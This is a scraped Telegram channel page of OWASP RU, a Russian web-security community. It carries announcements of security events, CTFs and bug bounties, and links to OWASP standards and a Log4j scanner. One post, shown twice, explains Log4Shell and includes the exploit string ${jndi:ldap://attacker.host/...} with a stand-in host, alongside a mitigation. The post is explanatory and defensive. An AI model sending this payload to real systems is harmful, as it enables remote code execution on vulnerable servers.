https://habr.com/ru/companies/owasp/articles/817241/
OWASP RU
@owasp_ru
Chat: https://t.me/OWASP_Russia
OWASP RU (Russian)
Добро пожаловать в Telegram-канал OWASP RU! OWASP (Open Web Application Security Project) - это международная некоммерческая организация, занимающаяся повышением безопасности веб-приложений. Наш канал предоставляет актуальную информацию о новейших уязвимостях, методах защиты, обзорах инструментов и многое другое. Если вас интересует информационная безопасность веб-приложений, то OWASP RU - идеальное место для вас! Присоединяйтесь к нам, общайтесь с единомышленниками, задавайте вопросы и делитесь своим опытом. Вместе мы создадем безопасное интернет-пространство! Присоединяйтесь к нашему чату для активного общения: https://t.me/OWASP_Russia
OWASP RU
27 Jul, 18:32
https://github.com/OWASP/ASVS/blob/master/4.0/OWASP%20Application%20Security%20Verification%20Standard%204.0.3-ru.pdf за адаптацию и перевод спасибо Андрею Титову
OWASP RU
27 May, 07:50
В 11.00 стартует мероприятие "«Правильный» пентест — мы выбираем, нас выбирают", успейте зарегистрироваться и принять участие.
Обсудим критерии защищенности компаний, как провести пентест «правильно» и кем, какие предпосылки возникновения потребности в тестировании у заказчика. Рассмотрим инструменты для специалистов и грамотное техническое задание для пентестера, а также критерии оценки.
Обсудим критерии защищенности компаний, как провести пентест «правильно» и кем, какие предпосылки возникновения потребности в тестировании у заказчика. Рассмотрим инструменты для специалистов и грамотное техническое задание для пентестера, а также критерии оценки.
OWASP RU
10 Dec, 12:06
Log4j2 RCE Passive Scanner plugin for BurpSuite
https://github.com/whwlsfb/Log4j2Scan
https://github.com/whwlsfb/Log4j2Scan
OWASP RU
10 Dec, 11:07
У половины интернета нашли выполнение произвольного кода через Log4j.
Выглядит это так:
1) Посылаем специально сформированный запрос вида ${jndi:ldap://attacker.host/blabla} в любое место, которое потенциально может залогироваться.
2) JNDI (Java Naming and Directory Interface) в свою очередь обрабатывает шаблон, запрашивает данные через LDAP у attacker.host
3) В ответе отдается JAVA класс, который и позволяет выполнить произвольный код.
Гроб. Гроб. Кладбище.
Временный фикс:
Вот примеры того, что уязвимо (От Cloudflare и Apple до серверов майнкрафта).
Выглядит это так:
1) Посылаем специально сформированный запрос вида ${jndi:ldap://attacker.host/blabla} в любое место, которое потенциально может залогироваться.
2) JNDI (Java Naming and Directory Interface) в свою очередь обрабатывает шаблон, запрашивает данные через LDAP у attacker.host
3) В ответе отдается JAVA класс, который и позволяет выполнить произвольный код.
Гроб. Гроб. Кладбище.
Временный фикс:
JAVA_OPTS="-Dlog4j.formatMsgNoLookups=true”Вот примеры того, что уязвимо (От Cloudflare и Apple до серверов майнкрафта).
OWASP RU
03 Sep, 17:23
Охота за уязвимостями на ДЭГ-2021
https://bb.gosuslugi.ru официальная Bug Bounty от Госуслуг.
https://bb.gosuslugi.ru официальная Bug Bounty от Госуслуг.
OWASP RU
10 Aug, 10:19
YauzaCTF 2021 is a task-based competition that will take place online on August 27-29 at 12:00 (UTC+0).
It will give the participants the atmosphere of the Soviet past.
For 48 hours, participants will be able to solve tasks of all categories:
- web, reverse, pwn, forensics, crypto, OSINT, joy.
Also new categories have been added:
- hardware, pentest and emulation!
The organizers and sponsors of the event have prepared many interesting prizes. More details on the event website.
ABOUT EVENT:
🕹 Event website: https://yauzactf.com/en
📃 CTFtime page: https://ctftime.org/event/1417/
🔑 Competition type: task-based competition
📅 Start: on August 27 at 12:00 (UTC+0)
⏰ Duration: 48 hours
👨👨👦👦 Number of people in the team: maximum 7 people
🥇 Qualification: students from CIS schools or universities (graduating not earlier than 2021) and those, who born not earlier than 1995
It will give the participants the atmosphere of the Soviet past.
For 48 hours, participants will be able to solve tasks of all categories:
- web, reverse, pwn, forensics, crypto, OSINT, joy.
Also new categories have been added:
- hardware, pentest and emulation!
The organizers and sponsors of the event have prepared many interesting prizes. More details on the event website.
ABOUT EVENT:
🕹 Event website: https://yauzactf.com/en
📃 CTFtime page: https://ctftime.org/event/1417/
🔑 Competition type: task-based competition
📅 Start: on August 27 at 12:00 (UTC+0)
⏰ Duration: 48 hours
👨👨👦👦 Number of people in the team: maximum 7 people
🥇 Qualification: students from CIS schools or universities (graduating not earlier than 2021) and those, who born not earlier than 1995
OWASP RU
27 Jul, 20:54
Google запускает общую платформу для взаимодействия с багхантерами во всех продуктах компании: https://bughunters.google.com. Также доступен Университет бахгантеров для повышения скиллов: https://bughunters.google.com/learn
OWASP RU
10 Jun, 09:58
Небольшой анонс:
Завтра OWASP проведёт небольшой стрим по SAMM
https://www.meetup.com/OWASP-Moscow/events/278660867/
Welcome! )
Завтра OWASP проведёт небольшой стрим по SAMM
https://www.meetup.com/OWASP-Moscow/events/278660867/
Welcome! )
1,087
subscribers
5
photos
3
videos
